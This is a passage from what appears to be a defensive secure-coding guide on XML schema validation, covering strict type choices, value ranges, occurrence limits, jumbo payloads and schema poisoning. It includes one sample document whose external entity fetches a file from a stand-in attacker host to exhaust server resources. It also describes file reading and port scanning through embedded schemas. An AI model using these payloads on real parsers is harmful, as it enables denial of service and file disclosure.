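A similar gap between lenient and strict checking exists in Python's standard &amp;lt;tt&amp;gt;base64&amp;lt;/tt&amp;gt; module, which makes it a convenient illustration. This sketch is not a reproduction of the appliance's behavior; the helper names and the sample value are hypothetical.&lt;br /&gt;

```python
import base64
import binascii


def decode_lenient(value):
    """Default decoding: characters outside the base64 alphabet are discarded."""
    return base64.b64decode(value)


def decode_strict(value):
    """Strict decoding: any character outside the alphabet raises an error."""
    return base64.b64decode(value, validate=True)


tampered = "QUJD!!??"  # valid base64 for ABC followed by junk characters

print(decode_lenient(tampered))
try:
    decode_strict(tampered)
except binascii.Error as error:
    print("rejected:", error)
```

The lenient call silently drops the trailing junk and returns the decoded prefix, whereas the strict call rejects the whole value, which is the behavior a validator for &amp;lt;tt&amp;gt;base64Binary&amp;lt;/tt&amp;gt; content should have.&lt;br /&gt;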
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* negativeInteger: Only negative numbers&lt;br /&gt;
* nonNegativeInteger: Positive numbers and the zero value&lt;br /&gt;
* positiveInteger: Only positive numbers&lt;br /&gt;
* nonPositiveInteger: Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. To avoid that logical vulnerability, the schema should declare &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; as &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
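&lt;br /&gt;
The value ranges of the XML Schema integer types, and the effect of choosing the wrong one, can be sketched in Python. The mapping and the function name &amp;lt;tt&amp;gt;accepts&amp;lt;/tt&amp;gt; are hypothetical, and Python's &amp;lt;tt&amp;gt;int()&amp;lt;/tt&amp;gt; is more permissive than the XML Schema lexical rules, so this is an approximation rather than a validator.&lt;br /&gt;

```python
# Value ranges of the XML Schema integer types, expressed as predicates.
INTEGER_TYPES = {
    "negativeInteger": lambda value: 0 > value,
    "nonPositiveInteger": lambda value: 0 >= value,
    "nonNegativeInteger": lambda value: value >= 0,
    "positiveInteger": lambda value: value > 0,
    "integer": lambda value: True,
}


def accepts(type_name, text):
    """Return True when text is an integer inside the range of type_name."""
    try:
        value = int(text)
    except ValueError:
        return False
    return INTEGER_TYPES[type_name](value)


price = 10
quantity = "-5"  # attacker-controlled value
print("integer accepts it:", accepts("integer", quantity))
print("positiveInteger accepts it:", accepts("positiveInteger", quantity))
print("total if accepted:", price * int(quantity))
```

With the &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt; type the negative quantity passes validation and produces a negative total, while &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; rejects it before the multiplication takes place.&lt;br /&gt;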
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values Infinity and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type decimal is recommended:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
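Because &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not valid values for the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; set to either of them is rejected during validation and never reaches the application. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;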
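&lt;br /&gt;
The same distinction exists in application code. In the Python sketch below, &amp;lt;tt&amp;gt;float()&amp;lt;/tt&amp;gt; accepts the special values, while a check against a simplified form of the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; lexical rules rejects them. The function names and the pattern are assumptions made for illustration.&lt;br /&gt;

```python
import math
import re
from decimal import Decimal

# Simplified lexical form of a decimal: optional sign, digits, optional fraction.
DECIMAL_PATTERN = re.compile(r"[+-]?([0-9]+(\.[0-9]*)?|\.[0-9]+)")


def parse_price_as_float(text):
    """Permissive parsing: float() also accepts NaN and infinity spellings."""
    return float(text)


def parse_price_as_decimal(text):
    """Strict parsing: reject anything that is not a plain decimal number."""
    if DECIMAL_PATTERN.fullmatch(text) is None:
        raise ValueError(f"not a decimal value: {text!r}")
    return Decimal(text)


print(math.isnan(parse_price_as_float("NaN")))
print(math.isinf(parse_price_as_float("INF")))
print(parse_price_as_decimal("10.50"))
for special in ("NaN", "INF", "-INF"):
    try:
        parse_price_as_decimal(special)
    except ValueError as error:
        print("rejected:", error)
```

The pattern check is needed even with &amp;lt;tt&amp;gt;Decimal&amp;lt;/tt&amp;gt;, because the &amp;lt;tt&amp;gt;Decimal&amp;lt;/tt&amp;gt; constructor on its own also accepts strings such as NaN and Infinity.&lt;br /&gt;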
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When valid values must have one specific length (for example, 8), that length can be specified as follows:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
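&lt;br /&gt;
The same mechanism can be applied to numeric ranges. The following is a minimal sketch, assuming a hypothetical &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; element and illustrative limits of 1 and 1000; the actual limits should be chosen according to what the application can handle:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;quantity&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;!-- illustrative bounds, not taken from the examples above --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minInclusive value=&amp;quot;1&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxInclusive value=&amp;quot;1000&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;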
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed for an SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
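&lt;br /&gt;
Assertions were introduced in XML Schema 1.1, so a validator limited to version 1.0 will not accept the previous schema. As a rough sketch of an alternative for such validators, a union of the built-in types &amp;lt;tt&amp;gt;xs:negativeInteger&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;xs:positiveInteger&amp;lt;/tt&amp;gt; should describe the same set of values (every integer except zero):&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;!-- any integer below zero or above zero, but never zero itself --&amp;gt;&lt;br /&gt;
    &amp;lt;xs:union memberTypes=&amp;quot;xs:negativeInteger xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;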
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Leaving the maximum number of occurrences undefined means the application must cope with whatever happens when it receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, an optional element could use a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;0&amp;lt;/tt&amp;gt;, and an element with no upper limit could use a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
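&lt;br /&gt;
As a minimal sketch of such a limit, the declaration of the &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; element could be bounded as shown here. The value 100 is only a placeholder assumed for illustration; the real limit should come from testing how many elements the application can process:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;100&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!-- maxOccurs=&amp;quot;100&amp;quot; is a hypothetical upper bound replacing &amp;quot;unbounded&amp;quot; --&amp;gt;&lt;br /&gt;
  &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;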
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
•	Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
•	Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;soapenv:Envelope xmlns:soapenv=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot; xmlns:ext=&amp;quot;http://com/ibm/was/wssample/sei/echo/b2b/external&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soapenv:Header LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot;LARGEVALUE&amp;quot; LARGENAME3=&amp;quot;LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server processes external entities, the attacker could use the schema to, for example, read files from the server. This type of schema only serves as a suggestion for sending a document; to be used safely, there must be a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
